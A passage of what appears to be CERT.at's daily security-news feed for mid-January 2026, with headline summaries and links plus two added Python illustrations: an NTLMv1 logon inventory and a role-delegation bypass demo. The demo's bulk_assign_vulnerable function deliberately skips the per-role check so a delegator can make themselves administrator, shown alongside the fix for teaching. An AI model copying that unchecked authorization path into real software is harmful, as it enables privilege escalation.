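On the sample, two of five rules produce 13 of 16 false positives; the PowerShell rule gets an exclusion for the SCCM agent but stays enabled because it has caught a real incident, while the LSASS rule gets an exclusion for the EDR scanner. Feeding real closed-alert exports in the same shape is a matter of mapping the three field names.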




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Hackers exploit Modular DS WordPress plugin flaw for admin access&lt;/h3&gt;

Hackers are actively exploiting a maximum severity flaw in the Modular DS WordPress plugin that allows them to bypass authentication remotely and access the vulnerable sites with admin-level privileges.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/hackers-exploit-modular-ds-wordpress-plugin-flaw-for-admin-access/&quot;&gt;https://www.bleepingcomputer.com/news/security/hackers-exploit-modular-ds-wordpress-plugin-flaw-for-admin-access/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Critical flaw lets hackers track, eavesdrop via Bluetooth audio devices&lt;/h3&gt;

A critical vulnerability in Google's Fast Pair protocol can allow attackers to hijack Bluetooth audio accessories like wireless headphones and earbuds, track users, and eavesdrop on their conversations.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/critical-whisperpair-flaw-lets-hackers-track-eavesdrop-via-bluetooth-audio-devices/&quot;&gt;https://www.bleepingcomputer.com/news/security/critical-whisperpair-flaw-lets-hackers-track-eavesdrop-via-bluetooth-audio-devices/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;VU#383552: thelibrarian does not secure its interface, allowing for access to internal system data&lt;/h3&gt;

Multiple vulnerabilities were discovered in The Librarian, an AI-powered personal assistant tool provided by the company TheLibrarian.io. The Librarian can be used to manage personal email, calendar, documents, and other information through external services, such as Gmail and Google Drive, and also summarize meetings and schedule emails.
&lt;p /&gt;
&lt;A HREF=&quot;https://kb.cert.org/vuls/id/383552&quot;&gt;https://kb.cert.org/vuls/id/383552&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;VU#650657: Livewire Filemanager contains an insecure .php component that allows for unauthenticated RCE in Laravel Products&lt;/h3&gt;

A vulnerability, tracked as CVE-2025-14894, has been discovered within Livewire Filemanager, a tool designed for usage within Laravel applications. The Livewire Filemanager tool allows for users to upload various files, including PHP files, and host them within the Laravel application.
&lt;p /&gt;
&lt;A HREF=&quot;https://kb.cert.org/vuls/id/650657&quot;&gt;https://kb.cert.org/vuls/id/650657&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Juniper Networks: numerous security updates for various products&lt;/h3&gt;

Juniper Networks has released security updates for numerous products. IT admins should apply them promptly.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Juniper-Networks-Zahlreiche-Sicherheitsupdates-fuer-diverse-Produkte-11143432.html&quot;&gt;https://www.heise.de/news/Juniper-Networks-Zahlreiche-Sicherheitsupdates-fuer-diverse-Produkte-11143432.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security updates for Friday&lt;/h3&gt;

Security updates have been issued by AlmaLinux (gnupg2), Debian (firefox-esr), Oracle (cups, gnupg2, libpq, net-snmp, postgresql, postgresql:15, postgresql:16, transfig, and vsftpd), Red Hat (firefox), SUSE (apache2, curl, firefox, gpg2, hawk2, libcryptopp-devel, openCryptoki, python310, python311-urllib3, rke2, squid, and tomcat), and Ubuntu (cpp-httplib, git, python-apt, and simgear).
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1054683/&quot;&gt;https://lwn.net/Articles/1054683/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-01-16T18:29:42Z</dc:date></entry><entry><title>Daily summary - 15.01.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/1/tagesberichte-15012026"/><author><name>CERT.at</name></author><updated>2026-01-15T18:36:27Z</updated><published>2026-01-15T18:36:27Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Wednesday 14-01-2026 18:00 - Thursday 15-01-2026 18:00
Handler:     Alexander Riepl
Co-Handler:  Felician Fuchs


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Exploit code public for critical FortiSIEM command injection flaw&lt;/h3&gt;

Technical details and a public exploit have been published for a critical vulnerability affecting Fortinet's Security Information and Event Management (SIEM) solution that could be leveraged by a remote, unauthenticated attacker to execute commands or code.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/exploit-code-public-for-critical-fortisiem-command-injection-flaw/&quot;&gt;https://www.bleepingcomputer.com/news/security/exploit-code-public-for-critical-fortisiem-command-injection-flaw/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Critical flaw lets hackers track, eavesdrop via Bluetooth audio devices&lt;/h3&gt;

A critical vulnerability in Google's Fast Pair protocol can allow attackers to hijack Bluetooth audio accessories like wireless headphones and earbuds, track users, and eavesdrop on their conversations.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/critical-flaw-lets-hackers-track-eavesdrop-via-bluetooth-audio-devices/&quot;&gt;https://www.bleepingcomputer.com/news/security/critical-flaw-lets-hackers-track-eavesdrop-via-bluetooth-audio-devices/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Most Severe AI Vulnerability to Date Hits ServiceNow&lt;/h3&gt;

The ITSM giant tacked agentic AI onto a largely unguarded legacy chatbot, exposing customers' data and connected systems.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.darkreading.com/remote-workforce/ai-vulnerability-servicenow&quot;&gt;https://www.darkreading.com/remote-workforce/ai-vulnerability-servicenow&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;January Patch Tuesday: Windows updates break remote sign-in&lt;/h3&gt;

Some users are now having trouble signing in to Azure Virtual Desktop or Windows 365 via the Windows App. A fix is in the works.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/januar-patchday-windows-updates-machen-windows-app-kaputt-2601-204213.html&quot;&gt;https://www.golem.de/news/januar-patchday-windows-updates-machen-windows-app-kaputt-2601-204213.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Ransomware boss wanted: this man is said to be the leader of Black Basta&lt;/h3&gt;

Interpol, Europol and the BKA are hunting the boss of the Black Basta ransomware group, which has harmed more than 100 organizations in Germany alone.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/ransomware-boss-gesucht-dieser-mann-soll-der-anfuehrer-von-black-basta-sein-2601-204218.html&quot;&gt;https://www.golem.de/news/ransomware-boss-gesucht-dieser-mann-soll-der-anfuehrer-von-black-basta-sein-2601-204218.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;A 0-click exploit chain for the Pixel 9 Part 1: Decoding Dolby&lt;/h3&gt;

Over the past few years, several AI-powered features have been added to mobile phones that allow users to better search and understand their messages. One effect of this change is increased 0-click attack surface, as efficient analysis often requires message media to be decoded before the message is opened by the user. One such feature is audio transcription. 
&lt;p /&gt;
&lt;A HREF=&quot;https://projectzero.google/2026/01/pixel-0-click-part-1.html&quot;&gt;https://projectzero.google/2026/01/pixel-0-click-part-1.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;A 0-click exploit chain for the Pixel 9 Part 2: Cracking the Sandbox with a Big Wave&lt;/h3&gt;

With the advent of a potential Dolby Unified Decoder RCE exploit, it seemed prudent to see what kind of Linux kernel drivers might be accessible from the resulting userland context, the mediacodec context.
&lt;p /&gt;
&lt;A HREF=&quot;https://projectzero.google/2026/01/pixel-0-click-part-2.html&quot;&gt;https://projectzero.google/2026/01/pixel-0-click-part-2.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;A 0-click exploit chain for the Pixel 9 Part 3: Where do we go from here?&lt;/h3&gt;

While our previous two blog posts provided technical recommendations for increasing the effort required by attackers to develop 0-click exploit chains, our experience finding, reporting and exploiting these vulnerabilities highlighted some broader issues in the Android ecosystem. This post describes the problems we encountered and recommendations for improvement.
&lt;p /&gt;
&lt;A HREF=&quot;https://projectzero.google/2026/01/pixel-0-click-part-3.html&quot;&gt;https://projectzero.google/2026/01/pixel-0-click-part-3.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Researchers Null-Route Over 550 Kimwolf and Aisuru Botnet Command Servers&lt;/h3&gt;

The Black Lotus Labs team at Lumen Technologies said it null-routed traffic to more than 550 command-and-control (C2) nodes associated with the AISURU/Kimwolf botnet since early October 2025.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/kimwolf-botnet-infected-over-2-million.html&quot;&gt;https://thehackernews.com/2026/01/kimwolf-botnet-infected-over-2-million.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Verizon Outage Knocks Out US Mobile Service, Including Some 911 Calls&lt;/h3&gt;

A major Verizon outage appeared to impact customers across the United States starting around noon ET on Wednesday. Calls to Verizon customers from other carriers may also be impacted.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.wired.com/story/verizon-outage-knocks-out-us-mobile-service-including-some-911-calls/&quot;&gt;https://www.wired.com/story/verizon-outage-knocks-out-us-mobile-service-including-some-911-calls/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Raid in Germany: authorities shut down cybercrime hoster RedVDS&lt;/h3&gt;

International investigators and Microsoft have struck a blow against the infrastructure of the cybercrime hoster RedVDS. Some of the servers were located in Germany.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Razzia-in-Deutschland-Behoerden-machen-Cybercrime-Hoster-RedVDS-dicht-11141431.html&quot;&gt;https://www.heise.de/news/Razzia-in-Deutschland-Behoerden-machen-Cybercrime-Hoster-RedVDS-dicht-11141431.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Chrome: Google drops support for older macOS&lt;/h3&gt;

macOS 12, alias Monterey, released less than five years ago, will soon be dropped by Google's browser. Security vulnerabilities will remain unfixed there.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Chrome-Google-kappt-Support-fuer-aelteres-macOS-11140713.html&quot;&gt;https://www.heise.de/news/Chrome-Google-kappt-Support-fuer-aelteres-macOS-11140713.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;curl: project ends its bug bounty program&lt;/h3&gt;

curl maintainer Daniel Stenberg has announced the end of the bug bounty program. Useless AI-generated reports apparently got out of hand.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/curl-Projekt-beendet-Bug-Bounty-Programm-11142345.html&quot;&gt;https://www.heise.de/news/curl-Projekt-beendet-Bug-Bounty-Programm-11142345.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Criminals imitate bank phone numbers: beware of spoofing&lt;/h3&gt;

Criminals are constantly looking for new ways to get hold of account data. Unfortunately, they have found one: with spoofing they fake the phone numbers of banks and so gain their victims' trust.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.watchlist-internet.at/news/kriminelle-imitieren-banknummern-spoofing/&quot;&gt;https://www.watchlist-internet.at/news/kriminelle-imitieren-banknummern-spoofing/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Microsoft disrupts RedVDS cybercrime platform behind $40 million in scam losses&lt;/h3&gt;

Microsoft and law enforcement partners took down a popular cybercriminal subscription service called RedVDS that was used to enable more than $40 million in fraud losses in the United States alone.
&lt;p /&gt;
&lt;A HREF=&quot;https://therecord.media/microsoft-redvds-cybercrime-scam&quot;&gt;https://therecord.media/microsoft-redvds-cybercrime-scam&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;UAT-8837 targets critical infrastructure sectors in North America&lt;/h3&gt;

Cisco Talos is closely tracking UAT-8837, a threat actor we assess with medium confidence is a China-nexus advanced persistent threat (APT) actor.
&lt;p /&gt;
&lt;A HREF=&quot;https://blog.talosintelligence.com/uat-8837/&quot;&gt;https://blog.talosintelligence.com/uat-8837/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;GhostPoster Browser Malware Hid for 5 Years With 840,000 Installs&lt;/h3&gt;

Researchers uncover a 5-year malware campaign using browser extensions on Chrome, Firefox and Edge, relying on hidden payloads and shared infrastructure.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/ghostposter-browser-malware-840000-installs/&quot;&gt;https://hackread.com/ghostposter-browser-malware-840000-installs/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Closing the Door on Net-NTLMv1: Releasing Rainbow Tables to Accelerate Protocol Deprecation&lt;/h3&gt;

Mandiant is publicly releasing a comprehensive dataset of Net-NTLMv1 rainbow tables to underscore the urgency of migrating away from this outdated protocol. Despite Net-NTLMv1 having been deprecated and known to be insecure for over two decades, with cryptanalysis dating back to 1999, Mandiant consultants continue to identify its use in active environments.
&lt;p /&gt;
&lt;A HREF=&quot;https://cloud.google.com/blog/topics/threat-intelligence/net-ntlmv1-deprecation-rainbow-tables/&quot;&gt;https://cloud.google.com/blog/topics/threat-intelligence/net-ntlmv1-deprecation-rainbow-tables/&lt;/a&gt;
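The Net-NTLMv1 item appears in both the 15.01 and the 16.01 report. As an added example for both (code written for this digest, not from the Mandiant post or from CERT.at), the Python below does the first thing a migration needs: an inventory of which accounts and hosts still authenticate with NTLMv1, taken from the EventData fields of Windows Security event 4624, where the LmPackageName field reads NTLM V1, NTLM V2, LM or a dash. It also maps the LmCompatibilityLevel registry value to whether a host still sends NTLMv1 responses or a domain controller still accepts them. The event records are constructed sample data in the shape of a JSON export; the field names follow the 4624 schema.

```python
"""Inventory of NTLMv1 logons from Windows Security event 4624 records.

Added example with constructed sample data; not Mandiant or CERT.at code.
Field names follow the EventData schema of event 4624 (successful logon).
"""
from collections import defaultdict

# Constructed sample: EventData of a handful of logon events as a JSON export
# would present them (for instance Get-WinEvent piped to ConvertTo-Json).
SAMPLE_EVENTS = [
    {"EventID": 4624, "TargetDomainName": "CORP", "TargetUserName": "svc_backup",
     "WorkstationName": "BKP01", "IpAddress": "10.0.5.20", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V1"},
    {"EventID": 4624, "TargetDomainName": "CORP", "TargetUserName": "j.doe",
     "WorkstationName": "WS-117", "IpAddress": "10.0.8.41", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2"},
    {"EventID": 4624, "TargetDomainName": "CORP", "TargetUserName": "j.doe",
     "WorkstationName": "WS-117", "IpAddress": "10.0.8.41", "LogonType": 2,
     "AuthenticationPackageName": "Kerberos", "LmPackageName": "-"},
    {"EventID": 4624, "TargetDomainName": "CORP", "TargetUserName": "printer-svc",
     "WorkstationName": "MFP-LOBBY", "IpAddress": "10.0.9.9", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V1"},
    {"EventID": 4624, "TargetDomainName": "CORP", "TargetUserName": "svc_backup",
     "WorkstationName": "BKP01", "IpAddress": "10.0.5.20", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V1"},
    # A failed logon (4625) is not a successful NTLMv1 authentication; ignored.
    {"EventID": 4625, "TargetDomainName": "CORP", "TargetUserName": "svc_backup",
     "WorkstationName": "BKP01", "IpAddress": "10.0.5.20", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V1"},
]


def is_ntlm_logon(event):
    """Successful logon that went through the NTLM package (any version)."""
    return event.get("EventID") == 4624 and event.get("AuthenticationPackageName") == "NTLM"


def is_ntlmv1_logon(event):
    """Successful logon whose NTLM sub-package was NTLM V1 (or legacy LM)."""
    return is_ntlm_logon(event) and event.get("LmPackageName", "-").upper() in ("NTLM V1", "LM")


def ntlmv1_inventory(events):
    """Map (DOMAIN\\user, workstation, source IP) to the number of NTLMv1 logons."""
    counts = defaultdict(int)
    for ev in events:
        if is_ntlmv1_logon(ev):
            account = ev["TargetDomainName"] + "\\" + ev["TargetUserName"]
            counts[(account, ev["WorkstationName"], ev["IpAddress"])] += 1
    return dict(counts)


def summarize(events):
    """Totals plus the NTLMv1 sources, busiest first: the migration worklist."""
    inv = ntlmv1_inventory(events)
    return {
        "ntlm_logons": sum(1 for ev in events if is_ntlm_logon(ev)),
        "ntlmv1_logons": sum(inv.values()),
        "sources": sorted(inv.items(), key=lambda item: item[1], reverse=True),
    }


# LmCompatibilityLevel (HKLM\SYSTEM\CurrentControlSet\Control\Lsa): levels 0-2
# still send LM/NTLMv1 responses, level 3 and above send NTLMv2 only; on a
# domain controller level 4 refuses LM and only level 5 also refuses NTLMv1.
def host_still_sends_ntlmv1(lm_compatibility_level):
    return lm_compatibility_level in range(0, 3)


def dc_still_accepts_ntlmv1(lm_compatibility_level):
    return lm_compatibility_level in range(0, 5)


if __name__ == "__main__":
    report = summarize(SAMPLE_EVENTS)
    print("NTLM logons:", report["ntlm_logons"], "of which NTLMv1:", report["ntlmv1_logons"])
    for (account, host, ip), n in report["sources"]:
        print(f"  {n:3d}  {account}  from {host} ({ip})")
```

Run against a real export, the source list is what has to be emptied (by fixing the client, the appliance or the service account configuration) before LmCompatibilityLevel can be raised to 5 on the domain controllers without breaking logons.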

&lt;hr&gt;

&lt;h3&gt;New Remcos Campaign Distributed Through Fake Shipping Document&lt;/h3&gt;

FortiGuard Labs discovered a new phishing campaign in the wild. The campaign delivers a new variant of Remcos, a commercial lightweight remote access tool (RAT) with a wide range of capabilities, including system resource management, remote surveillance, network management, and Remcos agent management.
&lt;p /&gt;
&lt;A HREF=&quot;https://feeds.fortinet.com/~/940295429/0/fortinet/blogs~New-Remcos-Campaign-Distributed-Through-Fake-Shipping-Document&quot;&gt;https://feeds.fortinet.com/~/940295429/0/fortinet/blogs~New-Remcos-Campaign-Distributed-Through-Fake-Shipping-Document&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;I'm The Captain Now: Hijacking a global ocean supply chain network&lt;/h3&gt;

There's a good chance you have never heard of BLUVOYIX or Bluspark Global, and that's ok! Not every company that powers global commerce is a household name. Despite their low profile, companies like these have an important role to play in keeping the global supply chain running in the background. Breaches at companies you haven't heard of can often have the worst impacts.
&lt;p /&gt;
&lt;A HREF=&quot;https://eaton-works.com/2026/01/14/bluspark-bluvoyix-hack/&quot;&gt;https://eaton-works.com/2026/01/14/bluspark-bluvoyix-hack/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Malicious Chrome Extension Steals MEXC API Keys for Account Takeover&lt;/h3&gt;

A malicious Chrome extension steals newly created MEXC API keys, exfiltrates them to Telegram, and enables full account takeover with trading and withdrawal rights.
&lt;p /&gt;
&lt;A HREF=&quot;https://socket.dev/blog/malicious-chrome-extension-steals-mexc-api-keys&quot;&gt;https://socket.dev/blog/malicious-chrome-extension-steals-mexc-api-keys&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Critical WordPress Modular DS Plugin Flaw Actively Exploited to Gain Admin Access&lt;/h3&gt;

A maximum-severity security flaw in a WordPress plugin called Modular DS has come under active exploitation in the wild, according to Patchstack. The vulnerability, tracked as CVE-2026-23550 (CVSS score: 10.0), has been described as a case of unauthenticated privilege escalation impacting all versions of the plugin prior to and including 2.5.1. It has been patched in version 2.5.2.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/critical-wordpress-modular-ds-plugin.html&quot;&gt;https://thehackernews.com/2026/01/critical-wordpress-modular-ds-plugin.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Role Delegation - Moderately critical - Access bypass - SA-CONTRIB-2026-002&lt;/h3&gt;

This module allows site administrators to grant specific roles the authority to assign selected roles to users, without them needing the &quot;administer permissions&quot; permission. The module contains an access bypass vulnerability when used in combination with the Views Bulk Operations module. A user with the ability to delegate a role is also able to assign the administrator role, including to their own user.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.drupal.org/sa-contrib-2026-002&quot;&gt;https://www.drupal.org/sa-contrib-2026-002&lt;/a&gt;
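The bypass described above is an authorization gap between two code paths that both assign roles. As an added, language-neutral illustration in Python (not Drupal or Role Delegation module code; the policy class, role names and user names are invented), the block below models a delegation policy, the single-user form path that enforces it per role, a bulk-operation path that only checks that the actor may run role assignments at all and so lets a delegator hand themselves the administrator role, and the fixed bulk path that re-runs the same per-role check.

```python
"""Role delegation: single-user path versus bulk path authorization.

Added illustration, not Drupal code; module, role and user names are invented.
"""
ADMINISTRATOR = "administrator"


class RoleDelegationPolicy:
    """delegatable maps an actor's role to the set of roles it may hand out."""

    def __init__(self, delegatable):
        self.delegatable = {k: set(v) for k, v in delegatable.items()}

    def assignable_roles(self, actor):
        allowed = set()
        for role in actor["roles"]:
            allowed |= self.delegatable.get(role, set())
        return allowed

    def check(self, actor, role):
        """The one authorization decision every role-assignment path must make."""
        if role not in self.assignable_roles(actor):
            raise PermissionError(f"{actor['name']} may not assign role {role!r}")


def assign_role_form(policy, actor, target, role):
    """Single-user form: checks the specific role before assigning it."""
    policy.check(actor, role)
    target["roles"].add(role)


def bulk_assign_vulnerable(policy, actor, targets, role):
    """Bulk action that only asks whether the actor may run role assignments
    at all and never checks the requested role: the access-bypass pattern."""
    if not policy.assignable_roles(actor):
        raise PermissionError(f"{actor['name']} has no delegation rights")
    for target in targets:
        target["roles"].add(role)


def bulk_assign_fixed(policy, actor, targets, role):
    """Bulk action that re-uses the per-role check of the single-user path."""
    policy.check(actor, role)
    for target in targets:
        target["roles"].add(role)


def demo(bulk_fn):
    """A content lead who may only hand out 'editor' targets their own account
    with the administrator role through the given bulk function. Returns
    whether the escalation succeeded."""
    policy = RoleDelegationPolicy({"content_lead": {"editor"}})
    actor = {"name": "lead", "roles": {"content_lead"}}
    try:
        bulk_fn(policy, actor, [actor], ADMINISTRATOR)
        return ADMINISTRATOR in actor["roles"]
    except PermissionError:
        return False


if __name__ == "__main__":
    print("vulnerable bulk path escalates:", demo(bulk_assign_vulnerable))
    print("fixed bulk path escalates:", demo(bulk_assign_fixed))
```

The fix is not a special case for the administrator role: every path that changes a user's roles calls the same per-role check, so a new bulk action or API endpoint cannot reintroduce the gap.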

&lt;hr&gt;

&lt;h3&gt;Group invite - Moderately critical - Access bypass - SA-CONTRIB-2026-001&lt;/h3&gt;

This module allows group managers to invite people into their group. The module doesn't sufficiently check access under certain circumstances, allowing unauthorized users to access the group's content.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.drupal.org/sa-contrib-2026-001&quot;&gt;https://www.drupal.org/sa-contrib-2026-001&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Microsoft Entra ID SSO Login - Critical - Access bypass - SA-CONTRIB-2026-005&lt;/h3&gt;

This module enables Drupal sites to authenticate users via Microsoft Entra ID (formerly Azure AD) using OAuth 2.0. The module doesn't sufficiently validate API responses from Microsoft allowing complete account takeover of any user, including site administrators, without requiring any credentials or access to the target's email account.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.drupal.org/sa-contrib-2026-005&quot;&gt;https://www.drupal.org/sa-contrib-2026-005&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Fortinet: Heap-based buffer overflow in cw_acd daemon (FortiOS, FortiSASE, FortiSwitchManager)&lt;/h3&gt;

A heap-based buffer overflow vulnerability [CWE-122] in FortiOS and FortiSwitchManager cw_acd daemon may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests. CVE-2025-25249 / CVSSv3 Score 7.4
&lt;p /&gt;
&lt;A HREF=&quot;https://fortiguard.fortinet.com/psirt/FG-IR-25-084&quot;&gt;https://fortiguard.fortinet.com/psirt/FG-IR-25-084&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Attackers can force Palo Alto firewalls into maintenance mode&lt;/h3&gt;

Under certain conditions attackers can exploit a vulnerability in PAN-OS to attack Palo Alto Networks firewalls. According to the security vendor there is no evidence of attacks so far.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Angreifer-koennen-Palo-Alto-Firewalls-in-Wartungsmodus-zwingen-11142149.html&quot;&gt;https://www.heise.de/news/Angreifer-koennen-Palo-Alto-Firewalls-in-Wartungsmodus-zwingen-11142149.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;CVE-2026-0227 PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway and Portal (Severity: HIGH)&lt;/h3&gt;

A vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to cause a denial of service (DoS) to the firewall. Repeated attempts to trigger this issue result in the firewall entering maintenance mode.
&lt;p /&gt;
&lt;A HREF=&quot;https://security.paloaltonetworks.com/CVE-2026-0227&quot;&gt;https://security.paloaltonetworks.com/CVE-2026-0227&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security Vulnerabilities fixed in Thunderbird 140.7&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.mozilla.org/en-US/security/advisories/mfsa2026-05/&quot;&gt;https://www.mozilla.org/en-US/security/advisories/mfsa2026-05/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security Vulnerabilities fixed in Thunderbird 147&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.mozilla.org/en-US/security/advisories/mfsa2026-04/&quot;&gt;https://www.mozilla.org/en-US/security/advisories/mfsa2026-04/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-01-15T18:36:27Z</dc:date></entry><entry><title>Daily summary - 14.01.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/1/tagesberichte-14012026"/><author><name>CERT.at</name></author><updated>2026-01-14T18:52:57Z</updated><published>2026-01-14T18:52:57Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Tuesday 13-01-2026 18:00 - Wednesday 14-01-2026 18:30
Handler:     Felician Fuchs
Co-Handler:  n/a


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Target employees confirm leaked source code is authentic&lt;/h3&gt;

Multiple current and former Target employees confirmed that leaked source code samples posted by a threat actor match real internal systems. The company also rolled out an &quot;accelerated&quot; lockdown of its Git server, requiring VPN access, a day after being contacted by BleepingComputer.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/target-employees-confirm-leaked-source-code-is-authentic/&quot;&gt;https://www.bleepingcomputer.com/news/security/target-employees-confirm-leaked-source-code-is-authentic/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Microsoft: Windows 365 update blocks access to Cloud PC sessions&lt;/h3&gt;

Microsoft confirmed that a recent Windows 365 update is blocking customers from accessing their Microsoft 365 Cloud PC sessions.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/microsoft/microsoft-windows-365-update-blocks-access-to-cloud-pc-sessions/&quot;&gt;https://www.bleepingcomputer.com/news/microsoft/microsoft-windows-365-update-blocks-access-to-cloud-pc-sessions/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Cloud marketplace Pax8 accidentally exposes data on 1,800 MSP partners&lt;/h3&gt;

Cloud marketplace and distributor Pax8 has confirmed that it mistakenly sent an email to fewer than 40 UK-based partners containing a spreadsheet with internal business information, including MSP customer and Microsoft licensing data.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/cloud-marketplace-pax8-accidentally-exposes-data-on-1-800-msp-partners/&quot;&gt;https://www.bleepingcomputer.com/news/security/cloud-marketplace-pax8-accidentally-exposes-data-on-1-800-msp-partners/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Reprompt attack let hackers hijack Microsoft Copilot sessions&lt;/h3&gt;

Researchers identified an attack method dubbed &quot;Reprompt&quot; that could allow attackers to infiltrate a user's Microsoft Copilot session and issue commands to exfiltrate sensitive data.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/reprompt-attack-let-hackers-hijack-microsoft-copilot-sessions/&quot;&gt;https://www.bleepingcomputer.com/news/security/reprompt-attack-let-hackers-hijack-microsoft-copilot-sessions/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;ConsentFix debrief: Insights from the new OAuth phishing attack&lt;/h3&gt;

ConsentFix is an OAuth phishing technique abusing browser-based authorization flows to hijack Microsoft accounts. Push Security shares new insights from continued tracking, community research, and evolving attacker techniques.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/consentfix-debrief-insights-from-the-new-oauth-phishing-attack/&quot;&gt;https://www.bleepingcomputer.com/news/security/consentfix-debrief-insights-from-the-new-oauth-phishing-attack/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Microsoft updates Windows DLL that triggered security alerts&lt;/h3&gt;

Microsoft has resolved a known issue that was causing security applications to incorrectly flag a core Windows component, the company said in a service alert posted this week.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/microsoft/microsoft-updates-windows-dll-that-triggered-security-alerts/&quot;&gt;https://www.bleepingcomputer.com/news/microsoft/microsoft-updates-windows-dll-that-triggered-security-alerts/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Without authentication: Broadcom flaw lets attackers take down entire Wi-Fi networks&lt;/h3&gt;

Numerous Wi-Fi networks based on Broadcom chipsets can be taken down with a single data packet. Attackers need no key to do so.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/ohne-authentifizierung-broadcom-luecke-laesst-angreifer-ganze-wlan-netze-lahmlegen-2601-204166.html&quot;&gt;https://www.golem.de/news/ohne-authentifizierung-broadcom-luecke-laesst-angreifer-ganze-wlan-netze-lahmlegen-2601-204166.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Corrupting LLMs Through Weird Generalizations&lt;/h3&gt;

